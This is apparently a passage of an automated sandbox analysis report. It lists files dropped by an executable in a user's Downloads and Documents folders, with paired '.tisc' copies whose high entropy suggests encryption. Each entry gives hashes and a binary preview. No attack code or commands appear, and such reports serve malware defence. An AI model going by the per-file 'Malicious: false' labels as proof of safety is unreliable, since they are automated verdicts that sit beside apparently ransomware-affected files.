                                                                                    SHA-512:0D00B8CA9876BFB010D5460224C6B2D36DF39A00C9E74085C71BAF0FAB8C55D430BA8780CEA9280B7CC6B053DDE391506ABC4289E55D2471D62B6052376EE7B0
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: R'iR.......U.*....8g....M...Q[..v.......k.?\i.yf.o]...x..2....^...=.x.e>.B+y.n...I..!...uSj....7x........v...&.P...7.W\E.o.......2?....F.,)......a...<.....X8CP.V....Ir.C....b.........vv."FfJ...";X.}t._.........R..\..N.$.. /.c..xvI..[9-.thi?@...y..7....G.[I.:9..;...._#...r.e..h.5...z;.3MG......].A....c ...+..O......+pX..d...}.Y.3......C.(.F.L.x"9.*.f..7...z._z...=..FR..a.<.......c..F.=W....V..'.1.....X^.Yno.1K........U.Ww......O.....3.1.f?.;Y.5..0.e2.8V..I.[.>...........`.+b...:.......@r.;...d.t?.w+t.t.)n.a.Pu..".X.s.G...,48l.K^...U..8.um.Q.Z...Eo..9.~.e..s.._......?qi.9...T.#$..a.X.f..z.q)..c.(..OyL./?.A.Uk.sC....z.0;;.h..gI.`.....}Vg=.c.&=A.u...1...6...4.c.....b`..|....l..#.=#.|Q@n.-C..G.L.[o...w..b.u...1^A.v6.V3...U...3.h._w.8.~.>...9s.KTQQ(V.=%.X..j..>.LM ..k.L?..dX...Yl.C...\.LU..._K..SZ^....L..."L.9H..kF....j..... ..h..JzQ.0.....i.*G.'....C5.L^........W.*.....~?..)..U.dn=..7.?..J.....X..\.a..]j.....=k/...z...8..s<... ..[..z.s....").6S
C:\Users\user\Documents\SUAVTZKNFL.xlsx.tisc (copy)
Process: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
File Type: data
Category: dropped
Size (bytes): 1355
Entropy (8bit): 7.83967878375075
Encrypted: false
SSDEEP: 24:L5msh44y39DQAPP7tELTE4hg8o6lhLB8Y7RoCyUZhv7jqgzNlPFSHmUn7xKrcv1M:Nn4jJQAPPhELTJK6jBNdlyohCgzfPFSO
MD5: 46977B572D06FBC248C5F38FFA003CC9
SHA1: 998A24536D6672F0B0F1188B4ED488DAA71130F2
SHA-256: 2B315BD9A8B9E9DD70C7A4E8FC6F6911C967D45FBA6FB2342C84F3C696FA4BE0
SHA-512: 0D00B8CA9876BFB010D5460224C6B2D36DF39A00C9E74085C71BAF0FAB8C55D430BA8780CEA9280B7CC6B053DDE391506ABC4289E55D2471D62B6052376EE7B0
Malicious: false
Reputation: unknown
C:\Users\user\Downloads\BJZFPPWAPT.mp3
Process: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
File Type: data
Category: dropped
Size (bytes): 1355
Entropy (8bit): 7.825171126814661
Encrypted: false
SSDEEP: 24:lwBy91pvoNUf74vP08469vLyukHfc29eENViT41F4Ny5Llhwe2pNm/aORru2WPgX:lqIKO7c0846ZyuvENs41Pnw3NlSnD
MD5: 7B5B73DBBEA32C68639012A2D06F3D78
SHA1: 2D51C4DDF4787632A072832CEA606578925E5565
SHA-256: DE441206BE0CAAC9C1A8DE7C1A318201E7B8DBB0E50BBB27DFED3DBEF6FF9189
SHA-512: 1F2700141E227E8C2D9B240712FCE2BA8236E3E15BA620DB895E20854538C7AF57CDCF8B22ACC850B2FB11FE96073E217D1682407D8E77E7AF0D375CEBA16DD2
Malicious: false
Reputation: unknown
C:\Users\user\Downloads\BJZFPPWAPT.mp3.tisc (copy)
Process: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
File Type: data
Category: dropped
Size (bytes): 1355
Entropy (8bit): 7.825171126814661
Encrypted: false
SSDEEP: 24:lwBy91pvoNUf74vP08469vLyukHfc29eENViT41F4Ny5Llhwe2pNm/aORru2WPgX:lqIKO7c0846ZyuvENs41Pnw3NlSnD
MD5: 7B5B73DBBEA32C68639012A2D06F3D78
SHA1: 2D51C4DDF4787632A072832CEA606578925E5565
SHA-256: DE441206BE0CAAC9C1A8DE7C1A318201E7B8DBB0E50BBB27DFED3DBEF6FF9189
SHA-512: 1F2700141E227E8C2D9B240712FCE2BA8236E3E15BA620DB895E20854538C7AF57CDCF8B22ACC850B2FB11FE96073E217D1682407D8E77E7AF0D375CEBA16DD2
Malicious: false
Reputation: unknown
C:\Users\user\Downloads\BNAGMGSPLO.mp3
Process: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
File Type: data
Category: dropped
Size (bytes): 1355
Entropy (8bit): 7.824480771584375
Encrypted: false
SSDEEP: 24:0Ahp3thpGYJob0/alMQq8w8pGV1Z/jM8h4v3ess2oqZ24/FgN93ChGgbD:ZT3thpGYib0/MMXP8pGzZL1K3Hs21r/v
MD5: BE11F589679C2D650F29795402419612
SHA1: 0025ACCC276203DBFEFC00218D2D1480F5897ACC
SHA-256: 3F2C4911A0B6E547FC0F986AAE35874D5817D37AE0197C4AB871A40BB80A83DF
SHA-512: 96951A46FAAA5BF8D2DA5A487E93F50057382F5D3FF8B20A3F5A65B5BDBE60A4409727F16F673567F32AA4FC35B6E00BB74441C447E0ACFA5974C6CCB93A90A5
Malicious: false
Reputation: unknown
C:\Users\user\Downloads\BNAGMGSPLO.mp3.tisc (copy)
Process: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
File Type: data
Category: dropped
Size (bytes): 1355
Entropy (8bit): 7.824480771584375
Encrypted: false
SSDEEP: 24:0Ahp3thpGYJob0/alMQq8w8pGV1Z/jM8h4v3ess2oqZ24/FgN93ChGgbD:ZT3thpGYib0/MMXP8pGzZL1K3Hs21r/v
MD5: BE11F589679C2D650F29795402419612
SHA1: 0025ACCC276203DBFEFC00218D2D1480F5897ACC
SHA-256: 3F2C4911A0B6E547FC0F986AAE35874D5817D37AE0197C4AB871A40BB80A83DF
SHA-512: 96951A46FAAA5BF8D2DA5A487E93F50057382F5D3FF8B20A3F5A65B5BDBE60A4409727F16F673567F32AA4FC35B6E00BB74441C447E0ACFA5974C6CCB93A90A5
Malicious: false
Reputation: unknown
C:\Users\user\Downloads\BNAGMGSPLO.pdf
Process: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
File Type: data
Category: dropped
Size (bytes): 1355
Entropy (8bit): 7.854436793170185
Encrypted: false
SSDEEP: 24:6YUlHrWhHIM6o47dO7t5x9gBcUTulGh4NfRxCyaWp3TFNBq3QQqosOy2HyGxAgbD:SHrOdHT74BpTuRN5xC5+Y3Bly2HyGxZD
MD5: 15B2D7672A58162BCFED2EC1DA60D3E2
SHA1: C8F6B548E6AD24810226F3CF3054B7CDA39FDEBA
SHA-256: 8A8B5A26BEF1CB807F6CEBCE9773703F57FDDBCA5D7347E814D4FA2DF5184C30
SHA-512: 38148666B7049E8DD4032D7B913A5B89A99D91D286573D0AC0D8F7D5731DFD5D754034ADD8EE2FAF9AA36E23DA39F0122263252080C2B53A821278A99CEF4963
Malicious: false
Reputation: unknown
C:\Users\user\Downloads\BNAGMGSPLO.pdf.tisc (copy)
Process: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
File Type: data
Category: dropped
Size (bytes): 1355
Entropy (8bit): 7.854436793170185
Encrypted: false
SSDEEP: 24:6YUlHrWhHIM6o47dO7t5x9gBcUTulGh4NfRxCyaWp3TFNBq3QQqosOy2HyGxAgbD:SHrOdHT74BpTuRN5xC5+Y3Bly2HyGxZD
MD5: 15B2D7672A58162BCFED2EC1DA60D3E2
SHA1: C8F6B548E6AD24810226F3CF3054B7CDA39FDEBA
SHA-256: 8A8B5A26BEF1CB807F6CEBCE9773703F57FDDBCA5D7347E814D4FA2DF5184C30
SHA-512: 38148666B7049E8DD4032D7B913A5B89A99D91D286573D0AC0D8F7D5731DFD5D754034ADD8EE2FAF9AA36E23DA39F0122263252080C2B53A821278A99CEF4963
Malicious: false
Reputation: unknown
C:\Users\user\Downloads\EEGWXUHVUG.jpg
Process: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
File Type: data
Category: dropped
Size (bytes): 1355
Entropy (8bit): 7.852477178069145
Encrypted: false
SSDEEP: 24:FAXSZzh3X2n/clZza9OXJ0uO7bNl+tn8rgwJ1FIw58ShpHzlBNfNgbD:FnZzh3Xw/cLa9sO7b3+W0wJ1758SrTlI
MD5: ACB2B657129B9A16289227266B64641E
SHA1: DF427D2541A25310A93C3126B95B1378CED40B2B
SHA-256: 894005DC79762CD0326A26DB87860D6BBF455FAD20F8F0CD631B1A4924FCDF8E
SHA-512: 508BF2E432BAA3E240C46C38977634C2664B94C3BE532E2ED7C653AE4A0B7421BF81B7052755FBA28DC17BF637F4027E0783F9DBF01C6DE1D2751F412A74A1F6
Malicious: false
Reputation: unknown
C:\Users\user\Downloads\EEGWXUHVUG.jpg.tisc (copy)
Process: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
File Type: data
Category: dropped
Size (bytes): 1355
Entropy (8bit): 7.852477178069145
Encrypted: false
SSDEEP: 24:FAXSZzh3X2n/clZza9OXJ0uO7bNl+tn8rgwJ1FIw58ShpHzlBNfNgbD:FnZzh3Xw/cLa9sO7b3+W0wJ1758SrTlI
MD5: ACB2B657129B9A16289227266B64641E
SHA1: DF427D2541A25310A93C3126B95B1378CED40B2B
SHA-256: 894005DC79762CD0326A26DB87860D6BBF455FAD20F8F0CD631B1A4924FCDF8E
SHA-512: 508BF2E432BAA3E240C46C38977634C2664B94C3BE532E2ED7C653AE4A0B7421BF81B7052755FBA28DC17BF637F4027E0783F9DBF01C6DE1D2751F412A74A1F6
Malicious: false
Reputation: unknown
C:\Users\user\Downloads\EFOYFBOLXA.png
Process: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
File Type: data
Category: dropped
Size (bytes): 1355
Entropy (8bit): 7.835432952065649
Encrypted: false
SSDEEP: 24:RzkrkR1dBwWivsUPN8NCeogaKNq3grtIA5sJhVlpGEliZ2353hcqRXgbD:bhBaXGNpaKNq3615YhlliIpxXRKD
MD5: 08BE7041AA8173D7DAA99D926B521309
SHA1: 2CB680899BB5F56CDFDB6DA36E684E03E1A810D0
SHA-256: 481A090CB733493F9F1B710F1234EBBC404F513D947001E214E936AFEC0D8987
SHA-512: 80893D64D308780B716A1A7B50DFBB7F59641E83B27A16329B19884F8CA335813A0E896363A158A5B603A923E296FCF8E015E7916435B177766C249C209526D7
Malicious: false
Reputation: unknown
C:\Users\user\Downloads\EFOYFBOLXA.png.tisc (copy)
Process: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
File Type: data
Category: dropped
Size (bytes): 1355
Entropy (8bit): 7.835432952065649
Encrypted: false
SSDEEP: 24:RzkrkR1dBwWivsUPN8NCeogaKNq3grtIA5sJhVlpGEliZ2353hcqRXgbD:bhBaXGNpaKNq3615YhlliIpxXRKD
MD5: 08BE7041AA8173D7DAA99D926B521309
SHA1: 2CB680899BB5F56CDFDB6DA36E684E03E1A810D0
SHA-256: 481A090CB733493F9F1B710F1234EBBC404F513D947001E214E936AFEC0D8987
SHA-512: 80893D64D308780B716A1A7B50DFBB7F59641E83B27A16329B19884F8CA335813A0E896363A158A5B603A923E296FCF8E015E7916435B177766C249C209526D7
Malicious: false
Reputation: unknown
C:\Users\user\Downloads\PIVFAGEAAV.png
Process: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
File Type: data
Category: dropped
Size (bytes): 1355
Entropy (8bit): 7.845135871991003
Encrypted: false
SSDEEP: 24:u/deDicsfbGhlDePasSM9n/RBrN/dUMqZLR0RSRzzSYY3GRf6wjmZVord5gbD:uaM63MPR1UMgLqi6YY3jwSgBwD
MD5: 1116E4F9AC21587E58C694839662FB73
SHA1: 22A611C46A52FF837E2331929921F58B3009397B
SHA-256: 3783C2F2AB46B152FCF048D547AA3A5CEF8EC1965CA15ACF0E8A28BDEE1064A8
SHA-512: 436D6F271675D4BAFA3AF50B4461042351453BBA3D4B540FBA8A27005FCD39E75538DA009782D1A19D28A42BA2B1DF7FA15ADC397BB72A5506E2802A6E3D9C67
Malicious: false
Reputation: unknown
                                                                                    Preview: v..b.SdF..@.H. ..nu#.4J+S.(.5[...L@j.m....S..+n...y1.......\:....^..d.`.#.f?.A.F...[.+n.io....q.h..9U.{..8.q.B..g(Kr)./.d..Y.. /....,..i=...9......n........=Px..7.J....rO)...&.#...H!M(Y..|..z.....a./..H...|..1..|..>t6...D......B.b.pC7y....cJ..;toJ....8".N.0....md.>wr`.l.^.T..4...i-Ff.vO...J.YU...I.~*.u]....|.......9.......~N..VM..........s.8.y...y..4...z..y.....*.S_......n(r...Z/.A......9....2.Dg.:b,)b;..*.....K.9`... .........o.....&.......X.U6m.......|..jy"P..x.L...1. . ......n.Pfp.m03...OP.....k.Jx.S.._.....L.5.W.0.9.{bA..g6.....Z=..imj...,...\}.i.OaU.{.`.D........ht.'..KR...I\....XZ..X....t.".-.........?........l....I....NI.. .....E.h....O...`..............1..>PD...}:6.c..'R-.. .V...SD....ad..U.....b.=..BEKHu.6...t.N.a..).p.x....u$'.S.T..N..;..l.:P#.o..?+....].Lp.;.ym<.-...3.7..kb..=.n...t.....R."X<.....,u/..N..)V...W0rY.&.........L8...3i7&g.8..nA.C..j.6...%E0.....p...N. ..".)O-.nJ.e.m|.g.q.n.J..........1..s..?-.<.o......,.T.I....
                                                                                    C:\Users\user\Downloads\PIVFAGEAAV.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.845135871991003
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:u/deDicsfbGhlDePasSM9n/RBrN/dUMqZLR0RSRzzSYY3GRf6wjmZVord5gbD:uaM63MPR1UMgLqi6YY3jwSgBwD
                                                                                    MD5:1116E4F9AC21587E58C694839662FB73
                                                                                    SHA1:22A611C46A52FF837E2331929921F58B3009397B
                                                                                    SHA-256:3783C2F2AB46B152FCF048D547AA3A5CEF8EC1965CA15ACF0E8A28BDEE1064A8
                                                                                    SHA-512:436D6F271675D4BAFA3AF50B4461042351453BBA3D4B540FBA8A27005FCD39E75538DA009782D1A19D28A42BA2B1DF7FA15ADC397BB72A5506E2802A6E3D9C67
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: v..b.SdF..@.H. ..nu#.4J+S.(.5[...L@j.m....S..+n...y1.......\:....^..d.`.#.f?.A.F...[.+n.io....q.h..9U.{..8.q.B..g(Kr)./.d..Y.. /....,..i=...9......n........=Px..7.J....rO)...&.#...H!M(Y..|..z.....a./..H...|..1..|..>t6...D......B.b.pC7y....cJ..;toJ....8".N.0....md.>wr`.l.^.T..4...i-Ff.vO...J.YU...I.~*.u]....|.......9.......~N..VM..........s.8.y...y..4...z..y.....*.S_......n(r...Z/.A......9....2.Dg.:b,)b;..*.....K.9`... .........o.....&.......X.U6m.......|..jy"P..x.L...1. . ......n.Pfp.m03...OP.....k.Jx.S.._.....L.5.W.0.9.{bA..g6.....Z=..imj...,...\}.i.OaU.{.`.D........ht.'..KR...I\....XZ..X....t.".-.........?........l....I....NI.. .....E.h....O...`..............1..>PD...}:6.c..'R-.. .V...SD....ad..U.....b.=..BEKHu.6...t.N.a..).p.x....u$'.S.T..N..;..l.:P#.o..?+....].Lp.;.ym<.-...3.7..kb..=.n...t.....R."X<.....,u/..N..)V...W0rY.&.........L8...3i7&g.8..nA.C..j.6...%E0.....p...N. ..".)O-.nJ.e.m|.g.q.n.J..........1..s..?-.<.o......,.T.I....
                                                                                    C:\Users\user\Downloads\PWCCAWLGRE.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.8662794329640455
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:BfpUMJE5KuPLQm5KpO1ehULa3WPqA1sx3xQ+WA/FISsYlI58/KgbD:lpUPwZ5hTG943xQ+X/FvsovD
                                                                                    MD5:4F09BF1057097716B1A496A6E96807D4
                                                                                    SHA1:7CF877BE389FB675F4F331E5C0A4DDFA074DD9AE
                                                                                    SHA-256:0EAC3F8D768B607D4E1876D895F288716F458B7093D1F0C50CEF33A8711B00DA
                                                                                    SHA-512:91B3A7830E311C7E9C986F507874D0849E328FA220014B00AB6B488905C021120D8087F2A4860C36342BB6896D630E50BE35988BAD6E18AA8211A101A6EC4B65
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .x....._.%..w0....`...^8..O!.G(...8zZ@..>.4R...P....7r.H.....U..3...i.R.P...>YYaI...S... ....uN.v;..4.}F.x...T.Sq....p...I.+...m..S...w......5.....Diz\..*..U5.w..3........&.....g.<..e.R....BL.GW.R.._.Q3..+\........#R9j...0C.....W.1/V.r.j....~..D@Q|L...-M1k.....JN....D..".$Q.t.v<.K............H.........D_$..S...h......Q..%.b.O...H.\......X.....ieo.x_...r5...s..]<....G.... U...P[..}.N.2Z..../..u.n..7~........o..../Hv.O....Ij1%..........?.h.j...L.......$..v..d3.o...A....B..L.4........ ....o.9&.W1K.)....R.w....o-.f+6![H...J.A@X....?....|..U...8..F!....v.....c..B..6.......q..\.....K .`..{.jNp. ..'.......38:.....a..uX...k;.*.xq(......@."d..hm..w..V(...9.VZ.Yc8..... D..D....YB.pw.GwYd''.sYL.W >..4...../?[...].a.../......r.....s.LF.P....{b.......D.......v.P.X.D4P...u*.. ..7..Y....^..E.P......>.E.nf.."9..E!..rx.D......pS...*...Qt...5.....b}.>......"."..J...P.z?{?....\.%N...=..m.MT?Z$.p......nD1..}........f..F..w.9......%~...0...F.4o.`k<.V/.D#
                                                                                    C:\Users\user\Downloads\PWCCAWLGRE.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.8662794329640455
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:BfpUMJE5KuPLQm5KpO1ehULa3WPqA1sx3xQ+WA/FISsYlI58/KgbD:lpUPwZ5hTG943xQ+X/FvsovD
                                                                                    MD5:4F09BF1057097716B1A496A6E96807D4
                                                                                    SHA1:7CF877BE389FB675F4F331E5C0A4DDFA074DD9AE
                                                                                    SHA-256:0EAC3F8D768B607D4E1876D895F288716F458B7093D1F0C50CEF33A8711B00DA
                                                                                    SHA-512:91B3A7830E311C7E9C986F507874D0849E328FA220014B00AB6B488905C021120D8087F2A4860C36342BB6896D630E50BE35988BAD6E18AA8211A101A6EC4B65
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .x....._.%..w0....`...^8..O!.G(...8zZ@..>.4R...P....7r.H.....U..3...i.R.P...>YYaI...S... ....uN.v;..4.}F.x...T.Sq....p...I.+...m..S...w......5.....Diz\..*..U5.w..3........&.....g.<..e.R....BL.GW.R.._.Q3..+\........#R9j...0C.....W.1/V.r.j....~..D@Q|L...-M1k.....JN....D..".$Q.t.v<.K............H.........D_$..S...h......Q..%.b.O...H.\......X.....ieo.x_...r5...s..]<....G.... U...P[..}.N.2Z..../..u.n..7~........o..../Hv.O....Ij1%..........?.h.j...L.......$..v..d3.o...A....B..L.4........ ....o.9&.W1K.)....R.w....o-.f+6![H...J.A@X....?....|..U...8..F!....v.....c..B..6.......q..\.....K .`..{.jNp. ..'.......38:.....a..uX...k;.*.xq(......@."d..hm..w..V(...9.VZ.Yc8..... D..D....YB.pw.GwYd''.sYL.W >..4...../?[...].a.../......r.....s.LF.P....{b.......D.......v.P.X.D4P...u*.. ..7..Y....^..E.P......>.E.nf.."9..E!..rx.D......pS...*...Qt...5.....b}.>......"."..J...P.z?{?....\.%N...=..m.MT?Z$.p......nD1..}........f..F..w.9......%~...0...F.4o.`k<.V/.D#
                                                                                    C:\Users\user\Downloads\QCFWYSKMHA.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.828759405356668
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:c01omHNdxElMyzokwfquyD5kBxm7MrIi+7aMzcVEFkqU4gbD:cq1dxcskwfqRuU7M8N7/zLPQD
                                                                                    MD5:691392ED37563292FE9B7C3DA9248D78
                                                                                    SHA1:158643E103C261A01A819FA822BC758EBEF06612
                                                                                    SHA-256:F2E6BEB9BC8156BFFEBFC1D441E3AD05D9A62AD4066622A6D60B265C748BA155
                                                                                    SHA-512:AC0620DB6EDF90D590D4B09E99D0D90A567B6C3840F8FFFFE805ABCFB32234B7706D2DBE027A918B60CE237101AB964D40E60A73A0A5C329A8731D2D1FF662CE
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: e.f.Asi*.a.o.7t}..\^:...W..'2.\|'Q...Q^...W.yfo.z..7"..0....`4y+.%....t.h.f3.*.E...e.x.4#.....G......Z.5E...*,/....T>.A.......<..d.$.c..+z-.z..t.Y..fs'6D..................8r./..Y[..B...;....MpPW.Zq.3|./>...d.7.w.V.7.W.TS.:.@I......=.K3P]..Vh........W..7!cW..JJt.#.............W....z.........c.TS...L".s.\.../..Z.3.%W....R.A.<;.. ..7.n...#.....v..% .y3.\F..?.M....%=L.I.S{..>.......s3.+\]&H...(.X..x.G"Q...Sr..Z...........L..Y.B."u...?..i..3.4..P.....8x).....h....yE.......<.....d......e...{......4.4.....*...So..us.L....+?.$..@..FD....y...u'..\!.o. ....254`..~+Z.ZJ...g...#X...&.QAs..`v..,(.`.?.O.._Z...m..........Z3.6..z..% ..Q.?.)z.{$H.l~y...:M./x.w.".`...*...hl..+..qx.e..H%!....S..;.e%.~k.za..:F.j...2l?V.j.{.5.A.)j..a.,...%.I...._..N...}....y...Y...J.<...\l4..mT../.uj.9.`...:$b.\aK8.@CN|D+`....f.T@j.p..=OQ.O...-..vj....S....V....VlyF.H.L.(...W.e.sa."hSMf_..?.D.....S.Vv...!.....A,......n.....!@.^.}aA.f..6#v.$..<@.O.aY.`Yk-.....4....Wv... . {&`.t.
                                                                                    C:\Users\user\Downloads\QCFWYSKMHA.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.828759405356668
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:c01omHNdxElMyzokwfquyD5kBxm7MrIi+7aMzcVEFkqU4gbD:cq1dxcskwfqRuU7M8N7/zLPQD
                                                                                    MD5:691392ED37563292FE9B7C3DA9248D78
                                                                                    SHA1:158643E103C261A01A819FA822BC758EBEF06612
                                                                                    SHA-256:F2E6BEB9BC8156BFFEBFC1D441E3AD05D9A62AD4066622A6D60B265C748BA155
                                                                                    SHA-512:AC0620DB6EDF90D590D4B09E99D0D90A567B6C3840F8FFFFE805ABCFB32234B7706D2DBE027A918B60CE237101AB964D40E60A73A0A5C329A8731D2D1FF662CE
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: e.f.Asi*.a.o.7t}..\^:...W..'2.\|'Q...Q^...W.yfo.z..7"..0....`4y+.%....t.h.f3.*.E...e.x.4#.....G......Z.5E...*,/....T>.A.......<..d.$.c..+z-.z..t.Y..fs'6D..................8r./..Y[..B...;....MpPW.Zq.3|./>...d.7.w.V.7.W.TS.:.@I......=.K3P]..Vh........W..7!cW..JJt.#.............W....z.........c.TS...L".s.\.../..Z.3.%W....R.A.<;.. ..7.n...#.....v..% .y3.\F..?.M....%=L.I.S{..>.......s3.+\]&H...(.X..x.G"Q...Sr..Z...........L..Y.B."u...?..i..3.4..P.....8x).....h....yE.......<.....d......e...{......4.4.....*...So..us.L....+?.$..@..FD....y...u'..\!.o. ....254`..~+Z.ZJ...g...#X...&.QAs..`v..,(.`.?.O.._Z...m..........Z3.6..z..% ..Q.?.)z.{$H.l~y...:M./x.w.".`...*...hl..+..qx.e..H%!....S..;.e%.~k.za..:F.j...2l?V.j.{.5.A.)j..a.,...%.I...._..N...}....y...Y...J.<...\l4..mT../.uj.9.`...:$b.\aK8.@CN|D+`....f.T@j.p..=OQ.O...-..vj....S....V....VlyF.H.L.(...W.e.sa."hSMf_..?.D.....S.Vv...!.....A,......n.....!@.^.}aA.f..6#v.$..<@.O.aY.`Yk-.....4....Wv... . {&`.t.
                                                                                    C:\Users\user\Downloads\QCFWYSKMHA.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.826692470719276
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:/nKzEJkp9bhGUFyJ8GEfJnIfW7MkNdFgLP18cOFHwuj1D1VmYtq/f7WcODf+rgbD:SzdGUFXG2JCW4syL1IfwbMDf++D
                                                                                    MD5:1A71ECA6163170F9152F61BDB18FC4B1
                                                                                    SHA1:A823706C5A2A8E590B98EE4E38D279EA219A917D
                                                                                    SHA-256:B3109132A3DE7B9AE7DBC14D6173B63D2EE1C28F32830053A6F3B4032239E3F0
                                                                                    SHA-512:B6B3DCAADE94B3A0133586D41DCFCC0DE545383B04A806BBA26AA5B58B3915C978B7562E47D622B3EE24BCA8F889D2AE15A1522F91CD1F46FC705FB38816A5A0
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .,..T..H.9......l.Wo.~.=...r.c.../.yAF...Y.~.:-6.L....ro.....4H#...%..b.\*..........r~...m`..*.BF.&}".^.....cb64..\..w.*GZ....'......*.w.*..w..F}0.@.E...>]...^...f.o.m?.Uq.t.{..z.7.U.HE6.[..BI..QS.gA0.5...XI.....2........8S..I.u.."..Aiu.{{-..&......&.9...Y>.1.u)v{Dt..T..5..l>.|.{m...x...x.]....w......'...MM..L.f..u5.....h..Y......n}.o(..d....f......Lh.....#xC.C.".9.u..b.O.......}J'..-.g/...s..^...EK.<Yn.J...`......D.9m.......)j[#..vq}.....$)J.v..(...EQ...6.U......gvq1..^X=.FH..y4'.h.%|J.k@1L.....u....k...F.,.... .........H......I...'..o...X.Z..~:.Ut@....'...e..w.m....Q..C..$.V2..6..P.V.=......7P..<....hi......8...C%.....9..Z]u....`.W.0g.=....}b..T......A .....J*.W.J~N.NM.W.`..h;.J..8..#.......-.Yk....&.N...<vj...6.e..l..."=/^.1,7./.....{...Y@.Nx..2...n.A..ni..GF.8#...h9d.:.."..d.....a.).\U..x./.......J...W.\.rv.../pd...{....G.$z....I.3....^.l.u.../.%...A.P].Pjws...ur.........@...^.....Fmtu...?mK..31;.c....?.iU.<.n.z.:....}yz7]v....O..8=...
                                                                                    C:\Users\user\Downloads\QCFWYSKMHA.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.826692470719276
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:/nKzEJkp9bhGUFyJ8GEfJnIfW7MkNdFgLP18cOFHwuj1D1VmYtq/f7WcODf+rgbD:SzdGUFXG2JCW4syL1IfwbMDf++D
                                                                                    MD5:1A71ECA6163170F9152F61BDB18FC4B1
                                                                                    SHA1:A823706C5A2A8E590B98EE4E38D279EA219A917D
                                                                                    SHA-256:B3109132A3DE7B9AE7DBC14D6173B63D2EE1C28F32830053A6F3B4032239E3F0
                                                                                    SHA-512:B6B3DCAADE94B3A0133586D41DCFCC0DE545383B04A806BBA26AA5B58B3915C978B7562E47D622B3EE24BCA8F889D2AE15A1522F91CD1F46FC705FB38816A5A0
                                                                                    Malicious:false
                                                                                    Reputation:unknown
